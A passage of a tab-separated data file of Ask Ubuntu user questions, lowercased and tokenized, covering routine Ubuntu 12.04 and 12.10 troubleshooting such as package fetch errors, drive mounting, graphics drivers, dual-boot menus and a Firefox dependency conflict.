//ports.ubuntu.com/ubuntu-ports/pool/main/libi/libio-string-perl/libio-string-perl_1.08-2_all.deb temporary failure resolving 'ports.ubuntu.com' failed to fetch http : //ports.ubuntu.com/ubuntu-ports/pool/main/libt/libtimedate-perl/libtimedate-perl_1.2000-1_all.deb temporary failure resolving 'ports.ubuntu.com' failed to fetch http : //ports.ubuntu.com/ubuntu-ports/pool/main/libp/libparse-debianchangelog-perl/libparse-debianchangelog-perl_1.2.0-1ubuntu1_all.deb temporary failure resolving 'ports.ubuntu.com' e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? root @ localhost : /home/andres # and using `` apt-get update '' : root @ localhost : /home/andres # apt-get update err http : //ports.ubuntu.com precise inrelease err http : //ppa.launchpad.net precise inrelease err http : //ppa.launchpad.net precise release.gpg temporary failure resolving 'ppa.launchpad.net' err http : //ports.ubuntu.com precise-updates inrelease err http : //ports.ubuntu.com precise-security inrelease err http : //ports.ubuntu.com precise release.gpg temporary failure resolving 'ports.ubuntu.com' err http : //ports.ubuntu.com precise-updates release.gpg temporary failure resolving 'ports.ubuntu.com' err http : //ports.ubuntu.com precise-security release.gpg temporary failure resolving 'ports.ubuntu.com' reading package lists ... done w : failed to fetch http : //ports.ubuntu.com/ubuntu-ports/dists/precise/inrelease w : failed to fetch http : //ports.ubuntu.com/ubuntu-ports/dists/precise-updates/inrelease w : failed to fetch http : //ports.ubuntu.com/ubuntu-ports/dists/precise-security/inrelease w : failed to fetch http : //ppa.launchpad.net/tiomap-dev/release/ubuntu/dists/precise/inrelease w : failed to fetch http : //ports.ubuntu.com/ubuntu-ports/dists/precise/release.gpg temporary failure resolving 'ports.ubuntu.com' w : failed to fetch http : //ppa.launchpad.net/tiomap-dev/release/ubuntu/dists/precise/release.gpg temporary failure resolving 'ppa.launchpad.net' w : failed to fetch http : //ports.ubuntu.com/ubuntu-ports/dists/precise-updates/release.gpg temporary failure resolving 'ports.ubuntu.com' w : failed to fetch http : //ports.ubuntu.com/ubuntu-ports/dists/precise-security/release.gpg temporary failure resolving 'ports.ubuntu.com' w : some index files failed to download . they have been ignored , or old ones used instead . root @ localhost : /home/andres #
207288	nautilus does not display drives properly	nautilus 's sidebar partitions broke after a new fstab and an upgrade to quantal . i made a new fstab after putting it off for several months , and now nautilus does n't show anything in the `` devices '' pane . they still do show up their contents if i manually navigate to /mnt/whateveriassigneditto , but i miss quick-and-easy access from the sidebar . is this related to my upgrade to 12.10 or something else ? is there any fix that does not involve replacing my uuid references with /dev/sdax ? ( i have very dynamic partitioning layouts ; windows tends to crap out on me often . ) my fstab : # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > # proc /proc proc nodev , noexec , nosuid 0 0 # # / was on /dev/sda8 during installation uuid=3603e7ad-aa27-4487-acc9-486401fb03cc / ext4 errors=remount-ro 0 1 # # swap was on /dev/sda7 during installation uuid=47313ea9-05b2-409c-9954-6664a505d743 none swap sw 0 0 # # hopefully will mount primary windows install uuid=4a5cc6ce5cc6b3cb /mnt/windows7 ntfs-3g quiet , defaults , locale=en_us.utf8 , umask=0 , exec , user , rw 0 0 # # small ramdisk for faster acess times tmpfs /mnt/tmpfschk tmpfs size=100m 0 0 # # # less important volumes : # acer recovery partition ( primary ) uuid=56686a4c686a2ac7 /mnt/recovery ntfs-3g quiet , defaults 0 0 # # acer recovery partition ( logical ) uuid=1c15e94c686a2ac7 /mnt/recovery2 ntfs-3g quiet , defaults 0 0 # # backup windows install ( blank settings and stuff ) uuid=49e82e265cc6b3cb /mnt/windowsbackup ntfs-3g quiet , defaults 0 0 # # # fedora uuid=6ad48b44-99e9-425b-996f-c6d288dfee79 /mnt/fedora ext4 errors=remount-ro 0 0 # # fedora 's swap partition # uuid=9ec7bbb1-2b30-4f8e-9a4a-5355925a3c9d none swap noauto 0 0
207289	kernel panic while installing ubuntu 12.10 from usb drive	good evening , i recently looked into installing ubuntu alongside my windows . i was able to mount the iso on a usb drive using universal usb installer . i verified it with the md5sum utility and the hash is correct . when installing , i can get to the screen where i choose the boot order , select the usb drive , and then i get to a screen where ubuntu seems to be 'loading ' ( purple background with ubuntu logo and name in the middle ) . then , all of a sudden , i get a `` kernel panic - not syncing : fatal exception in interrupt '' error message . my specs : intel core 2 duo cpu t5850 @ 2.16 ghz / 4 gb of ram / packard bell computer from 2007 . / windows 7 ultimate x64 installed . what should i do now ? thanks for your help .
207292	will upgrading from ubuntu 10.04 to 10.10 delete my personal data ?	i am planning to upgrade my operating system ubuntu 10.04 to ubuntu 10.10 . i want to know whether this upgrading will delete all the data or not ?
207296	after upgrade to xubuntu 12.10 i have 2 mount points for each partition	just upgraded xubuntu 12.04 to 12.10 ( both xfce and lxde desktops are being used at this system ) . now i have 2 mount points for each partition . it looks like this : it appears this way in both thunar and pcmanfm . however , there are no dupes in nautilus . $ ls /dev/disk/by-id/ ata-st320410a_5fb3ma76 ata-st3250620a_9rt030b0-part3 scsi-sata_st320410a_5fb3ma76-part1 scsi-sata_st3250620a_9rt030b0-part4 ata-st320410a_5fb3ma76-part1 ata-st3250620a_9rt030b0-part4 scsi-sata_st320410a_5fb3ma76-part2 scsi-sata_st3250620a_9rt030b0-part5 ata-st320410a_5fb3ma76-part2 ata-st3250620a_9rt030b0-part5 scsi-sata_st320410a_5fb3ma76-part3 scsi-sata_st3250620a_9rt030b0-part6 ata-st320410a_5fb3ma76-part3 ata-st3250620a_9rt030b0-part6 scsi-sata_st3250620a_9rt030b0 scsi-sata_st3250620a_9rt030b0-part7 ata-st3250620a_9rt030b0 ata-st3250620a_9rt030b0-part7 scsi-sata_st3250620a_9rt030b0-part1 scsi-sata_st3250620a_9rt030b0-part8 ata-st3250620a_9rt030b0-part1 ata-st3250620a_9rt030b0-part8 scsi-sata_st3250620a_9rt030b0-part2 ata-st3250620a_9rt030b0-part2 scsi-sata_st320410a_5fb3ma76 scsi-sata_st3250620a_9rt030b0-part3 $ ls /dev/disk/by-uuid/ 01cd9e239fdf54f0 5299-430b 8824c9e324c9d3fa b05c582e-77df-4b83-8a75-17db1ab5dbc1 09a9cf9e-6af4-45ed-a9ac-782c764fe8d1 6bbd501e-7601-4ee7-b725-d3ec7f19f149 8b7c-baf8 f54ee301-4bd4-40e3-a9fb-75ca79c05974 50366cc66e8ba293 8553dc4a-5d63-4078-9be3-ea91a46d8c67 a5be1bcd-b7c6-4273-8ade-eb9cce15504d there are no scsi drives in this system . what could cause this problem ? is it a bug ?
207298	with new nvidia drivers wacom intuos tablet stopped working	i 've done an upgrade from 12.04 to 12.10 on a pc with an i7 processor , an nvidia gt630 card video card and an intuos 2 tablet . everything went smoothly until i tried to also upgrade the nvidia drivers using the additional drivers tab in the software sources application . now the tablet is recognized ( it shows up in the output from lsusb and xsetwacom -- list devices ) but neither the wacom mouse or pen controls the cursor . by plugging in a usb mouse i do get a working mouse . the strangest part is that occasionally the tablet works but i ca n't find any pattern to when this happens . i 've tried all the different nvidia drivers , but the problem is the same . possibly coincidently or they may have been there before and i did n't notice them , i now get some messages on shutdown that i do n't know the meaning of : rather than invoking init scripts through /etc/init.d use the service ( 8 ) utility , e.g . service s35 networking stop initctl : unknown job s35networking since the script you are attempting to invoke has been converted to an upstart job , you may also use the stop ( 8 ) utility , e.g. , stop s35networking is there a way to repair my installation or should i just do a fresh install of 12.10 ?
207303	ubuntu 12.10 does n't work on hp compaq 6820s anymore	i can confirm that ubuntu 12.10 is not working with hp compaq 6820s anymore . 12.04.1 lts works fine . i tried boot from usb and dvd , just cursor blinking after loading initrd . something is broken , i suspect that kms is causing the problem , it already causes some minor problems on previous versions on the ubuntu ( usb mouse stuttering and freezing ) . edit : i just have tried boot ubuntu 12.10 with `` nomodeset '' option enabled , and it worked ! you can try `` radeon.modeset=0 '' also , it should do the same as `` nomodeset '' option . sad thing is , that hw accel 3d is completely disabled with that option , just 2d works . so , if anyone can fix this . thx ! cheers !
207304	trouble opening disk manager in windows 7 after installing ubuntu 12.10	i have two disks , a ssd with my windows 7 installation and a mechanical disk with my ubuntu 32-bit installation . after deciding to install ubuntu 12.10 alongside my windows 7 installation i opened the disk manager in windows and shrunk my secondary drive with 30gb . then i installed ubuntu through the install alongside windows option . after deciding to upgrade my ubuntu installation to 64-bit , i decided to remove it from the disk manager . the problem is that now the disk manager wo n't open . the status is `` connecting to the service virtual disk service '' . ( translated from swedish ) anyone have any idea about how to solve this ?
207306	how do i restore déjà dup backups without déjà dup ?	so i 'm trying to restore my backup files with déjà dup , however , each time i enter in the correct password , it keeps asking for it over and over again . this seems to be a bug , and i have found a couple of bug reports already reported on this issue . i am currently using 12.04 , it did not also work in 12.10 . is there any other software that can restore these backups ?
207307	make pc w/ bluetooth fake keyboard + mouse for other computer ?	is there a way to have my pc talk to my laptop and have it send keyboard commands ?
207308	how do i use virtualbox and install windows 7	i have just installed ubuntu 12.04 and virtualbox . i am new to virtualbox and i am stuck on how to put on windows 7 on it . i do n't get how to do : cd/dvd drive .
207311	macbook pro 5.5 brightness settings work , are remembered , but are not used on startup	this question 's similar to various others in the forum where users ' brightness settings either do n't work or are not remembered : brightness controls does n't work on a macbook pro 5.5 ( ubuntu 12.04 lts ) desktop does n't remember brightness settings after a reboot in a new ( dual-boot ) ubuntu 12.10 install with encrypted home directory , brightness controls ( both the slider in the brightness and lock settings panel and the function keys ) worked out-of-the-box ( hurrah ! ) . unfortunately , the setting was not remembered . from thread ( 2 ) , comment 13 , i was able to get the system to remember the setting , but not to use it . for the record , on my system , it 's necessary to adjust the path in rc.local : # ! /bin/sh -e # # rc.local # # this script is executed at the end of each multiuser runlevel . # make sure that the script will `` exit 0 '' on success or any other # value on error . # # in order to enable or disable this script just change the execution # bits . # # by default this script does nothing . echo 0 > /sys/class/backlight/apple_backlight/brightness exit 0 this successfully records the brightness level of the screen at shutdown , but it has no effect on the screen brightness . i can tell the value is recorded because : /sys/class/backlight/apple_backlight/brightness contains a value at startup the slider in the brightness and lock panel is in the right position when i change move the slider in brightness and lock , or when i use the brightness function keys , the screen brightness changes to the next value to the value recorded in the brightness file ( for example , if i use the function keys to set the backlight to the dimmest setting where it 's still on , restart and use the function keys to dim the screen once , the backlight turns off ) does anyone have any idea how to complete the last piece of the puzzle ?
207313	chrome/chomium application shortcuts broken with 12.10	chrome/chromium allows you to turn a web page into a `` desktop application '' ( tools- > create application shortcut ) . this creates a desktop icon and or a menu item ( you get to choose ) that when launched will start a standalone instance of that web page . no url bar , the alt-tab switcher icon is the web page 's favicon , etc . this was all great with 12.04 . i recently installed 12.10 from scratch and these application shortcuts no longer work . they are neither in the menu , nor clickable from the desktop ( they are text files on the desktop ) . i understand that 12.10 has tried to integrate web apps more deeply , but perhaps in doing so they broke the already pretty good feature supplied by chrome . does anybody know how to re-enable this ?
207314	how can i add a picture as folder background in ubuntu ?	how could i add a picture as folder background ? for example if i have a movie folder , how i could add its poster as background in this folder ? i am using ubuntu 12.04
207316	can not dual windows xp and ubuntu	i am new to ubuntu and at the moment i am trying to get ubuntu 12.10 to one of my machines . the machine is a pentium 4 @ 3.06 , 2gb ram , 200gb hard drive and a nvidia geforce 8800 gt . a few days ago , i tried ubuntu without installing and it worked perfectly . yesterday , i decided to formatted the hard drive and divide my hard drive into four partitions : 1 for the xp , 1 for ubuntu , 1 for swamp and 1 where i will have my documents . everything went great , i installed xp and then ubuntu but i did something wrong on the partition window ( ubuntu partition window ) that i ended up without boot loader . this morning , i formatted everything again , installed xp and when i went to install ubuntu ( with the same dvd as before ) the problems started . first , i had a black screen with a message written with white text saying something like : unable to find a medium containing a live file system . after i burned another cd and tried again , i got stuck at the red dots ( loading screen ) . i then went online and i read somewhere that it could be the cd , so i checked the integrity of the cd and everything was fine . i also unplugged all usbs connected to the computer and nothing changed . i googled further options to try to solve my problem and some users suggested that people having these types of problems should try the alternate installation , which if i am not wrong is for networks . i then tried to install and yes the installation process was different from the normal cd , but it did get stuck on a page where it was doing something , like : ... finding ethd0 and it was stuck on the 100 % . i tried usb installation as well and it also got stuck at the red dots ( i do not have usb 3.0 on the computer in question ) . i have burned 5 different cd 's and all at low speed . i checked the integrity and all are fine . i downloaded other distribution as well as other versions of ubuntu and i still can not install or even run the live cd of ubuntu or any other distribution . what is really annoying me is that everything was working perfectly before , when i first tried to install ubuntu . edit : my boot load is normal , no errors and all the hardware is working fine . i forgot to mention that after the loading screen ( red dots ) gets stuck , the dvd drive and the hard drive goes into idle state . i also restored the default values of the bios and no luck .
207317	mount remotely mybook live network drive	i have a mybook live western digital 1tb hard disk connected to fritzbox 7270 router in office . when i am in the office , i can mount this drive to ubuntu since i have added to the etc/fstab file : //192.168.178.30/user /home/user/disk cifs auto , iocharset=utf8 , user=user % password 0 0 is there a similar , easy & safe way , to do the same when i am out of the office using the static ip of the fritzbox router ? i have already added tcp port forwarding in the router for ports 8080 ( to 80 of the disk ) and 8443 ( to 443 of the disk ) . i have activated also port forwarding to 445 . results are till now : ... cifs auto , iocharset=utf8 , port=445 , user=user % password 0 0 unable to find suitable address . ... cifs auto , iocharset=utf8 , ip=192.168.178.30 , user=user % password 0 0 mount error ( 115 ) : operation now in progress refer to the mount.cifs ( 8 ) manual page ( e.g . man mount.cifs ) ... cifs auto , iocharset=utf8 , port=445 , user=user % password 0 0 mount error ( 112 ) : host is down finally , when i do a port scan remotely at the fritz ! box router , there is no reading for port 445 . maybe this is the cause of the problem . does anyone know how to open it ( port forwarding of port 445 to the 445 port of the disk is activated ) ? i have also tried to manually change fritz ! box settings as described here but still during port scan on the router 445 port is not shown . thank you in advance
207323	'ia32-libs is not installed ' while installing skype on ubuntu	i downloaded skype from official site , but when installing i get this type of error ( reading database ... 100 % ( reading database ... 150271 files and directories currently installed . ) unpacking skype ( from ... /skype-ubuntu_4.0.0.8-1_amd64.deb ) ... dpkg : dependency problems prevent configuration of skype : skype depends on ia32-libs ; however : package ia32-libs is not installed . dpkg : error processing skype ( -- install ) : dependency problems - leaving unconfigured processing triggers for desktop-file-utils ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for gnome-menus ... read about that i need to install ia32-libs . tried to install them like this sudo apt-get install package-name : i386 but it does n't find it . any hint ? thx .
207330	appletviewer character encoding wrong after ubuntu update	i ran the most recent batch of updates to ubuntu 12.04 and , after this , appletviewer started to fail to show chinese characters even with the jvm file encoding arg set to utf-8 . before everything was fine , and nothing else has changed in my setup apart from the updates . any ideas would be greatly appreciated . =====resolved====== the problem was not the encoding but the java font instance i had used for the chinese . for some reason , this had started causing display problems at the same time as the updates ran , whereas before it was fine . it seems unlikely they were connected , but who knows ...
207335	how do i install ubuntu on an external harddrive ?	i have a 320 gb external hard drive connected to my macbook pro ( 5 , 5 ) . there are 2 partitions on it , one has data and the other one is empty . i tried installing ubuntu on the empty partition but it gives me an error about my partition map . does anybody know the solution to this ?
207337	access prompt keeps asking for gmail password	a pop up keeping appearing in ubuntu ( running 12.10 ) , asking for the password to my gmail account . the icon has a silver shield , and it is labeled access prompt . the actual window has an image of keys on a keyring , says “authentication request” in bold , and “please enter your password for the account , [ gmail address ] ” . it keeps saying my passwords are incorrect ... i 'm not even sure which account it 's talking about . what is going on ?
207342	ubuntu wont recognize my internal ssd	i just bought a lenovo u310 and installed ubuntu 12.10 with wubi to try it out . after a couple of days i decided to fully replace windows 7 and installed ubuntu 12.10 fully with a usb drive in my hdd . after installation i ca n't find my internal ssd , which i did not touch at any point . when i open the bios menu , in the boot priority order i can see the ata ssd1 . any help on whats wrong ? edit : extra info asked for sudo fdisk -l disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sda1 1 976773167 488386583+ ee gpt partition 1 does not start on physical sector boundary . sudo blkid /dev/sda1 : uuid= '' 0a0d-5756 '' type= '' vfat '' /dev/sda2 : uuid= '' f7e010ad-3fb1-44fc-bcba-0e0be3b3fdbd '' type= '' ext4 '' /dev/sda3 : uuid= '' 8014eddb-855e-44cf-b3d9-97421cb6be25 '' type= '' swap ''
207344	ubuntu blackscreen after grub	after first viewing compiz cube ubuntus graphics driver crashs and after that i turned the power of and restarted it but now there is a blackscreen after grub loader . it still works with windows or older kernel versions with vesa drivers .
207346	does the installer use cached downloads ?	when i use the nexus 7 installer , if i want to reinstall will the installer use cached downloads or will it redownload the images all over again ?
207348	the launcher does n't appear nor the manager apps and settings	i have only the window options at the desktop . i 'm able to open the firefox through the option get help online , but if i minimize the window i can not acceed it anymore . so i can not access to the programs or anything else . do i have to reinstall ubuntu ( i have the 11.10 version ) or is there another option ( for a beginner in linux ) .
207349	ubuntu software-center problems	i am running ubuntu 12.10 on my dell 17r using the windows installer . i am having software center problems , mainly this one : and for the second one it says im running amd64 but im running an intel i5 2nd gen
207352	shut down dialog appears at random / random shutdowns	for the past week or so , the standard `` shut down '' dialog appears at random , with no apparent cause . i upgraded from 12.04 to 12.10 and it still continues . it 's unbelievably irritating . it can appear when i 'm just typing into a text document , hours after the computer booted , or it can happen three seconds after i log in and have n't had a chance to interact with the desktop . if i press `` cancel '' the dialog may reappear within a few seconds , or a few hours . sometimes the laptop just powers off instantly a few seconds after pressing `` cancel '' . when this dialog appears , i do n't see anything weird in /var/log/*log and i do n't see any suspicious processes running . i have managed to capture this by monitoring the dbus session bus , when the dialog appears : method call sender=:1.6 - > dest=org.gnome.sessionmanager serial=285 path=/org/gnome/sessionmanager ; interface=org.gnome.sessionmanager ; member=shutdown method return sender=:1.0 - > dest=:1.6 reply_serial=285 but that gives me no clue as to who is requesting a shut down . the physical power button ( on this thinkpad t420s ) is not mapped to the shutdown prompt , and pressing it does nothing . i 've also seen this random shutdown behaviour if i boot the laptop , then kill lightdm so that no x server is running . at some point , the computer may sporadically say it 's going down for shutdown . then it does . any ideas what this could be , or how i can debug further ? update : this also happens with a ubuntu 10.04 live cd and a 12.04 live usb drive . however , i swapped out my ssd and put in the original hdd and i was able to install and run windows 7 for a while without problems . so , since this problem appeared recently and occurs on multiple os versions , i 'd guess it 's potentially a hardware problem . but given that i ca n't see what ( have n't seen any phantom key presses in showkey ) is wrong , and because windows works , i do n't really have a good case for calling in my thinkpad warranty ...
207356	keyboard shortcut for terminal does n't work since updating to 12.10	i have ctrl+alt+t assigned as my keyboard shortcut to launch a terminal window , but it stopped working after upgrading to 12.10 . i have verified that it is still set in the keyboard shortcuts settings menu , and have verified that other shortcuts ( e.g . ctrl+alt+c to open calculator ) work . i have also tried using assigning different key combinations to terminal , to see if that helps ( it does n't ) , e.g . unassigning ctrl+alt+c from calculator , and instead assigning it to terminal . no dice . any ideas what might be going on ?
207364	enter password for default keyring	how can i stop being prompted to unlock the ‘default’ keyring on boot ? it happens when i try to start ubuntu one . i checked password and keys , but there 's nothing there . it 's empty . i have never used ubuntu before so i am confused . thank you for all suggestions . i 've read them all . the problem is that the password and keys does not have any tabs , or password that i can change . there 's nothing to right click or delete . it 's empty : i ca n't post an image since i am a newbie .
207365	google earth - unable to connect server	i have recently installed ubuntu 12.04 and also installed google earth . after opening google earth instead of the maps only appears a black screen ( i can see the menus with a lot of options in grey ) . after waiting a few minutes , i see an error saying that google earth was unable to connect to the image server . i used to have in the same computer google earth on ubuntu 10.10 without any problems . internet works fine , even i can use the internal browser of google earth . i tried disabling ipv6 , deleting ~/.config/google and everything i found in google , but it did n't work . can anybody help me ?
207367	order in which passphrase is asked for encrypted volumes	i have installed 12.10 on a machine with two disks . the root partition is on one disk , the swap partition on the other . both disks are encrypted and i have added the corresponding entries to /etc/crypttab . during boot , it asks for the passphrase for the disk with the root filesystem . then it continues booting and gets to the login screen before i get a chance to enter the passphrase for the other disk . after logging in , i verified that it was actually waiting for me to enter the passphrase for that second partition ( askpass process is running ) . but at that point , i have no way of entering the passphrase anymore . the manpage for crypttab suggests that the order in which the volumes are specified matters , so i changed it to have the swap disk first . i updated the initramfs and grub afterwards , but it did n't make any difference . how can i specify the order in which the encrypted partitions are unlocked ? i 'm looking for a solution that either asks for the swap passphrase first or tells the system to wait until all encrypted partitions are unlocked before displaying the login screen . ideally i want to be able to use hibernation , i.e . neither use a random key for swap nor encode the key in crypttab .
207368	can not make nvidia driver work with ubuntu 12.10	i seem to have a problem similar to many but i did n't manage to get it solved : have a lenovo n581 with an nvidia geforce 610m have just installed a fresh ubuntu 12.10 64 bits , + kde and am trying to have my nvidia card work . have tried all workarounds posted : purge nvidia , install kernel source/headers and then reinstall nvidia-current-updates ( or just nvidia-current ) , do `` sudo nvidia-xconfig '' . it does create a xorg.conf but does not much ( no module section by the way ) . the result is that my system ( jokey ) tells me that the driver is there but not in use and i only get a 640x480 resolution . if i try to launch nvidia-settings it does indeed tell me that the nvidia driver is not used . i do all this under kde but i guess it does matter at this stage . any hint of how to resolve this ? i feel stuck and can not use any of the acceleration which is partly why i got that laptop in the first place ... thanks for any help/advise you may provide !
207369	low-res emacs24 icon in application switcher	i recently upgraded to quantal , and also switched up to emacs24 from 23 . everything is great , except for one thing : the icon in the application switcher for emacs24 is a horrible , low-resolution eyesore . compare the two side-by-side : i 've seen a couple of questions addressing issues like this , but they 're not quite the same . this one says that it is happening with all icons , but that 's clearly not the case here . and this one seems more relevant , but it is talking about gnome , not unity . in the comments to the one answer for the second question , it says to look at the icons in /usr/share/icons to see if they are low-resolution , and if so to replace them with better ones . there 's a ton of emacs icons , in fact . they are in various subfolders of /usr/share/icons/hicolor and they are in sizes ranging from 16x16 to 128x128 , and also there are scaleable .svg versions of the icons too . i noticed that there are no 192x192 or 256x256 versions . but it seems like that should n't matter , since emacs23 also did n't have icons in those sizes . any help would be much appreciated !
207370	ubuntu 12.04.1 lts usb not being detected after formatting with startup disk creator	sudo fdisk -l lists the drive , however , i can not find it in the file explorer . disk /dev/sda : 250.1 gb , 250059350016 bytes 255 heads , 63 sectors/track , 30401 cylinders , total 488397168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000d871e device boot start end blocks id system /dev/sda1 * 2048 486322175 243160064 83 linux /dev/sda2 486324222 488396799 1036289 5 extended /dev/sda5 486324224 488396799 1036288 82 linux swap / solaris disk /dev/sdb : 8195 mb , 8195480064 bytes 253 heads , 62 sectors/track , 1020 cylinders , total 16006797 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00027ae4 device boot start end blocks id system /dev/sdb1 * 62 15999719 m 7999829 c w95 fat32 ( lba ) manually mounting it produces this error message : ~ $ sudo mount -t vfat /dev/sdb1 /media/external -ouiduid=1000 , gid=1000 , utf8 , dmask=027 , fmask=137 mount : wrong fs type , bad option , bad superblock on /dev/sdb1 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so is the usb toast ? update : thank you to everyone who has responded thus far . it is a sandisk cruzer and the solution proposed by fabricator4 worked .
207372	is it necessary to format windows xp os to do partitioning for ubuntu , and how do i do it properly to then install ubuntu from disk	is it necessary to format windows xp os to do partitioning for ubuntu , and how do i do it properly to then install ubuntu 10.10 from disk , and would it work from 10.10 to get 12.04 updates ? thank you all ; for being , for being soooo forth-giving and for all you ever will to be . i endeavor to support and be of such torch-carrying also , and am honored by the beautious examples of the people in these forums .
207374	ubuntu 12.10 amd drivers	i installed ubuntu 12.10 the entire hdd fresh , and everything is ok , but i noticed additonal drivers circle with green -- [ advanced mirco device [ amd ] nee at : cedar pro [ radeon hd 5450/6350 ] the device is using the recommended driver . [ checked ] using x.org x server - amd/ati display driver wrapper from xserver-xorg-video-ati ( open source , tested ) [ uncheck ] using video driver for the amd graphic accelerators from fglrx propertery [ uncheck ] same the above and fglrx-updates is ok with checked ? i wants to know , thanks
207378	how do i package a unity lens ?	i 'm new to ubuntu apps and launchpad . i 've created a unity lens using quickly , but i 'm stuck on how to deploy it . i have two questions . i can create a .deb file using quickly package , but when i install it , i still need to manually restart unity and run the project using quickly run . after installing this lens from the ubuntu software center , will users have to do this as well ? if so , how can i do this automatically so they do n't have to ? i 'm confused as to what i need to do to make my project be installed using a ppa . i 've pushed my code to launchpad using bazaar . i 've also created a ppa , pgp key and a ssh key . what do i need to do next ? any help would be appreciated . my project in launchpad is unity-lens-php .
207380	new 12.10 install , windows not in boot menu	i just installed ubuntu 12.10 on my new computer alongside my previous windows 7 installation . upon booting for the first time ( post install ) my boot menu only lists ubuntu . i installed using a livecd , i had to set up my partitions myself because my windows was n't being detected ( i set up the new partition out of free space on the drive. ) . i know ubuntu did not overwrite my windows because i can mount the windows drive and access the files from here . i also tried running boot-repair , as was recommended for people who did n't have ubuntu showing up in the menu , but now i just have two different ubuntu options . still no windows . ( if you require any additional data [ logs , etc . ] , could you tell me how to find it , i am a bit new to this . any help is greatly appreciated .
207381	ca n't install gphpedit	why can i not install gphpedit ? i get these errors : failed to fetch //http : //security.ubuntu.com/ubuntu/pool/main/w/webkit/libjavascriptcoregtk-1.0-0_1.8.1-0ubuntu0.12.04.1_amd64.deb 404 not found [ ip : 91.189.92.190 80 ] failed to fetch //http : //security.ubuntu.com/ubuntu/pool/main/w/webkit/libwebkitgtk-1.0-common_1.8.1-0ubuntu0.12.04.1_all.deb 404 not found [ ip : 91.189.92.190 80 ] failed to fetch //http : //security.ubuntu.com/ubuntu/pool/main/w/webkit/libwebkitgtk-1.0-0_1.8.1-0ubuntu0.12.04.1_amd64.deb 404 not found [ ip : 91.189.92.190 80 ]
207387	can i use the ubuntu nexus 7 desktop installer on other tablets ?	could i install ubuntu on galaxy note using nexus 7 desktop installer ?
207389	urgent : firefox circular-dependency hell - linux mint 13 ( based on ubuntu 12.04 )	having difficulty re-installing firefox , after an installation to resolve places.sqlite issues . it appears that i 'm trapped in circular dependency hell . need to resolve firefox dependency hell to attempt to resolve tomcat6 project dependencies ( do n't ask ) , asap . have been trying for hours . what i 've done ( brief ) 1 ) sudo apt-get purge firefox firefox-globalmenu firefox-gnome-support 2 ) sudo apt-get update 3 ) sudo apt-get install firefox firefox-globalmenu firefox-gnome-support 4 ) sudo apt-get -f install potential error sources : found in ( sudo apt-get install firefox firefox-globalmenu firefox-gnome-support ) dpkg : error processing /var/cache/apt/archives/firefox_18.0~a2~hg20121027r113701-0ubuntu1~umd1~precise_amd64.deb ( -- unpack ) : trying to overwrite '/usr/lib/firefox/extensions ' , which is also in package mint-search-addon 2012.05.11 so , /usr/lib/firefox/extensions does n't even exist ! deleted /var/cache/apt/archives/firefox_18.0~a2~hg20121027r113701 as per recommendations . errors were encountered while processing : /var/cache/apt/archives/firefox_18.0~a2~hg20121027r113701-0ubuntu1~umd1~precise_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) outputs : 1 ) sudo apt-get purge firefox firefox-globalmenu firefox-gnome-support tyler @ machine ~ $ sudo apt-get purge firefox firefox-globalmenu firefox-gnome-support [ sudo ] password for tyler : reading package lists ... done building dependency tree reading state information ... done package firefox is not installed , so not removed the following packages will be removed : firefox-globalmenu* firefox-gnome-support* 0 upgraded , 0 newly installed , 2 to remove and 38 not upgraded . 2 not fully installed or removed . after this operation , 460 kb disk space will be freed . do you want to continue [ y/n ] ? y ( reading database ... dpkg : warning : files list file for package `mysqltuner ' missing , assuming package has no files currently installed . ( reading database ... 192642 files and directories currently installed . ) removing firefox-globalmenu ... removing firefox-gnome-support ... 3 ) tyler @ machine ~ $ sudo apt-get install firefox firefox-globalmenu firefox-gnome-support tyler @ machine ~ $ sudo apt-get install firefox firefox-globalmenu firefox-gnome-support reading package lists ... done building dependency tree reading state information ... done suggested packages : latex-xft-fonts the following new packages will be installed : firefox firefox-globalmenu firefox-gnome-support 0 upgraded , 3 newly installed , 0 to remove and 38 not upgraded . need to get 0 b/24.8 mb of archives . after this operation , 54.3 mb of additional disk space will be used . ( reading database ... dpkg : warning : files list file for package `mysqltuner ' missing , assuming package has no files currently installed . ( reading database ... 192619 files and directories currently installed . ) unpacking firefox ( from ... /firefox_18.0~a2~hg20121027r113701-0ubuntu1~umd1~precise_amd64.deb ) ... dpkg : error processing /var/cache/apt/archives/firefox_18.0~a2~hg20121027r113701-0ubuntu1~umd1~precise_amd64.deb ( -- unpack ) : trying to overwrite '/usr/lib/firefox/extensions ' , which is also in package mint-search-addon 2012.05.11 selecting previously unselected package firefox-globalmenu . unpacking firefox-globalmenu ( from ... /firefox-globalmenu_18.0~a2~hg20121027r113701-0ubuntu1~umd1~precise_amd64.deb ) ... selecting previously unselected package firefox-gnome-support . unpacking firefox-gnome-support ( from ... /firefox-gnome-support_18.0~a2~hg20121027r113701-0ubuntu1~umd1~precise_amd64.deb ) ... processing triggers for man-db ... processing triggers for desktop-file-utils ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for gnome-menus ... processing triggers for mintsystem ... errors were encountered while processing : /var/cache/apt/archives/firefox_18.0~a2~hg20121027r113701-0ubuntu1~umd1~precise_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) 4 ) sudo apt-get -f install 0 upgraded , 0 newly installed , 0 to remove , and 38 not upgraded ideas ? tomcat6 only deploys my web application successfully in firefox , not chrome , so i 'm really hoping to resolve this dependency issue .
